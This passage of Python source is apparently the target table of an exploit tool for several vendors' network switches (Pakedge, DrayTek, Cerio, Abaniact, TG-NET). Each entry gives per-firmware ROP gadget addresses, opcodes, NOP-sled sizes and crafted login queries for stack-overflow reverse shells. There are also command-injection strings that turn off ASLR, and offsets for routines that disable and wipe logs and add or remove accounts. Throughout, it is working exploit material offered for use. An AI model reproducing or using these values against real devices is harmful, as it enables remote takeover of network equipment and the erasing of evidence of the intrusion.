(address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_file_del()\r\n\t\t\t\t\t\t'log_fileClear':0x4847FC,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x42C910,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject CMD)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x42C910,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x42B6F8,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'dispatcher.cgi',\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()\r\n\t\t\t\t\t\t'query':'username=_USRNOP&password=_PWDNOP_RA_START&login=1&_USRNOP_USRNOP_SHELLCODE',\r\n\t\t\t\t\t\t'START':0x7fff7004,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x7fc60000,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 28,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 20,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 0,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':True,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t#\r\n\t\t\t# Pakedgedevice & Software\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : Yes\r\n\t\t\t# Boa/Hydra reverse shell: No (cannot point 
JMP correct into NOP on heap)\r\n\t\t\t# Del /var/log/ram.log : Yes\r\n\t\t\t# Del /var/log/flash.log : Yes\r\n\t\t\t# Del /mntlog/flash.log : Yes\r\n\t\t\t# Add credentials : Yes\r\n\t\t\t# Del credentials : Yes\r\n\t\t\t#\r\n\t\t\t'225-21785': {\r\n\t\t\t\t'model':'SX-8P',\r\n\t\t\t\t'template':'Pakedge',\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'1.04',\t\t\t\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40C86C,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f998538,\t\t\t# la $t9, system # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x248492ec,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': { #\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_global_set()\r\n\t\t\t\t\t\t'log_settings_set':0x413AEC,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()\r\n\t\t\t\t\t\t'log_ramClear':0x413A14,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()\r\n\t\t\t\t\t\t'log_fileClear':0x413A14,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log 
(address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x4108E4,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject RCE)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x4108E4,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x4108E4,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'set.cgi',\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()\r\n\t\t\t\t\t\t'START':0x7ffeff04,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x7fc60000,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 64,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 77,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 3,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':True,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t#\r\n\t\t\t# Draytek\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : Yes\r\n\t\t\t# Boa/Hydra reverse shell: No (cannot point JMP correct into NOP on heap)\r\n\t\t\t# Del /var/log/ram.log : Yes\r\n\t\t\t# Del /var/log/flash.log : Yes\r\n\t\t\t# Del /mntlog/flash.log : Yes\r\n\t\t\t# Add credentials : Yes\r\n\t\t\t# Del credentials : Yes\r\n\t\t\t#\r\n\t\t\t'752-95168': {\r\n\t\t\t\t'template':'DrayTek',\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'2.1.4',\t\t\t\t\t\t# 
Version / binary dependent stuff\r\n\t\t\t\t'model':'VigorSwitch P1100', \t\t\t#\r\n\t\t\t\t'uri':'https://www.draytek.com/products/vigorswitch-p1100/',\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40C67C,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f99852c,\t\t\t# la $t9, system # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x248490ac,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': { #\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_global_set()\r\n\t\t\t\t\t\t'log_settings_set':0x413E34,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()\r\n\t\t\t\t\t\t'log_ramClear':0x413D64,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()\r\n\t\t\t\t\t\t'log_fileClear':0x413D64,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x410CA8,\t# Jump one after 'sw 
$ra'\t\t\t# Set SNTP Server (Inject RCE)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x410CA8,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x410CA8,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'set.cgi',\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()\r\n\t\t\t\t\t\t'START':0x7ffeff04,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x7fc60000,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 64,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 77,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 3,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':True,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t#\r\n\t\t\t# Cerio\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : Yes\r\n\t\t\t# Boa/Hydra reverse shell: Yes\r\n\t\t\t# Del /var/log/ram.log : Yes\r\n\t\t\t# Del /var/log/flash.log : Yes\r\n\t\t\t# Del /mntlog/flash.log : Yes\r\n\t\t\t# Add credentials : Yes\r\n\t\t\t# Del credentials : Yes\r\n\t\t\t#\r\n\t\t\t'224-5061': {\r\n\t\t\t\t'template':'Cerio',\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'1.00.29',\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'model':'CS-2424G-24P', \t\t\t#\r\n\t\t\t\t'uri':'https://www.cerio.com.tw/eng/switch/poe-switch/cs-2424g-24p/',\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 
0x40E6DC,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f998524,\t\t\t# la $t9, system # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x248411bc,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': { #\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_diag_traceroute_set()\r\n\t\t\t\t\t\t'sys_ping_post_cmd':'&srvHost=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;&count=1',\r\n\t\t\t\t\t\t'sys_ping_post_check':'',\r\n\t\t\t\t\t\t'web_sys_ping_post':0x40E114,\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_global_set()\r\n\t\t\t\t\t\t'log_settings_set':0x41DB4C,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()\r\n\t\t\t\t\t\t'log_ramClear':0x41DA94,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()\r\n\t\t\t\t\t\t'log_fileClear':0x41DA94,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': 
{\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x415F14,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject RCE)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x415F14,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x415F14,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': False,\t\t\t# \r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'set.cgi',\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()\r\n\t\t\t\t\t\t'START':0x7ffeff04,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x7fc60000,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 64,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 77,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 3,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':True,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t#\r\n\t\t\t# Abaniact\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : Yes\r\n\t\t\t# Boa/Hydra reverse shell: Yes\r\n\t\t\t# Del /var/log/ram.log : Yes\r\n\t\t\t# Del /var/log/flash.log : No\r\n\t\t\t# Del /mntlog/flash.log : No\r\n\t\t\t# Add credentials : Yes\r\n\t\t\t# Del credentials : Yes\r\n\t\t\t#\r\n\t\t\t'222-45866': {\r\n\t\t\t\t'template':'Abaniact',\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'116B00033',\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'model':'AML2-PS16-17GP L2',\t\t\t# 
Model\r\n\t\t\t\t'uri':'https://www.abaniact.com/L2SW/',\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40E65C,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f998524,\t\t\t# la $t9, system) # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x2484152c,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': { #\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t# Ping IPv4\r\n\t\t\t\t\t\t#'sys_ping_post_cmd':'ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space&count=1',\r\n\t\t\t\t\t\t#'verify_uri':'/tmp/pingtest_tmp',\r\n\t\t\t\t\t\t#'web_sys_ping_post':0x4296FC,\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_ping_post()\r\n\r\n\t\t\t\t\t\t# traceroute\r\n\t\t\t\t\t\t'web_sys_ping_post':0x429F58,\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_trace_route_post()\r\n\t\t\t\t\t\t'sys_ping_post_cmd':'ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/traceroute_tmp #&tr_maxhop=30&count=1',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/traceroute_tmp',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_setting_post()\r\n\t\t\t\t\t\t'log_settings_set':0x4B4FE4,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary 
dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_file_del()\r\n\t\t\t\t\t\t'log_ramClear':0x4BA5D0,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_file_del()\r\n\t\t\t\t\t\t'log_fileClear':0x4BA5D0,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x43764C,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject CMD)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x43764C,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x431CC4,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'dispatcher.cgi',\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()\r\n\t\t\t\t\t\t'query':'username=admin&password=_PWDNOP_RA_START&login=1&shellcod=_USRNOP_USRNOP_USRNOP_SHELLCODE',\r\n\t\t\t\t\t\t'START':0x7ffe6e04,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x7fc60000,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'stack':True,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'usr_nop': 53,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 45,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 0,\t\t\t\t\t\t# Align opcodes in 
memory\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'workaround':True,\t# My LAB workaround\r\n\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t#\r\n\t\t\t# TG-NET Botone Technology Co.,Ltd.\r\n\t\t\t# (Traces in this image: 3One Data Communication, Saitian, Sangfor, Sundray, Gigamedia, GetCK, Hanming Technology)\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : Yes\r\n\t\t\t# Boa/Hydra reverse shell: Yes\r\n\t\t\t# Del /var/log/ram.log : Yes\r\n\t\t\t# Del /var/log/flash.log : No\r\n\t\t\t# Del /mntlog/flash.log : No\r\n\t\t\t# Add credentials : Yes\r\n\t\t\t# Del credentials : Yes\r\n\t\t\t#\r\n\t\t\t'222-81176': {\r\n\t\t\t\t'template':'TG-NET',\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'3.1.1-R1',\t\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'model':'P3026M-24POE (V3)',\t\t\t\t# Model\r\n\t\t\t\t'uri':'http://www.tg-net.net/productshow.asp?ProdNum=1049&parentid=98',\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40C74C,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f99851c,\t\t\t# la $t9, system) # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x2484a2d4,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': { #\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; 
web_log_setting_post()\r\n\t\t\t\t\t\t'log_settings_set':0x46AC10,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_file_del()\r\n\t\t\t\t\t\t'log_ramClear':0x46E368,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_file_del()\r\n\t\t\t\t\t\t'log_fileClear':0x46E368,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x42243C,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject CMD)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x42243C,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x424DE0,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\r\n\t\t\t\t\t\t'vulnerable':False,\r\n\t\t\t\t\t}, \r\n\r\n\t\t\t\t\t# Interesting when there is a fresh heap with 0x00's (4 x 0x00 == MIPS NOP),\r\n\t\t\t\t\t# and to fill wider area with sending '&%8f%84%01=%8f%84%80%18' where:\r\n\t\t\t\t\t# \r\n\t\t\t\t\t# NOP's\r\n\t\t\t\t\t# '24%04%FF=' : '=' will be replaced with 0x00, li $a0, 0xFFFFFF00\r\n\t\t\t\t\t# '%24%04%FF%FF' : li $a0, 0xFFFFFFFF\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'dispatcher.cgi',\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()\r\n\t\t\t\t\t\t'query':'username='+ self.random_string(112) +'_RA_START&password='+ self.random_string(80) +'&login=1'+ ('&%24%04%FF=%24%04%FF%FF' * 50) 
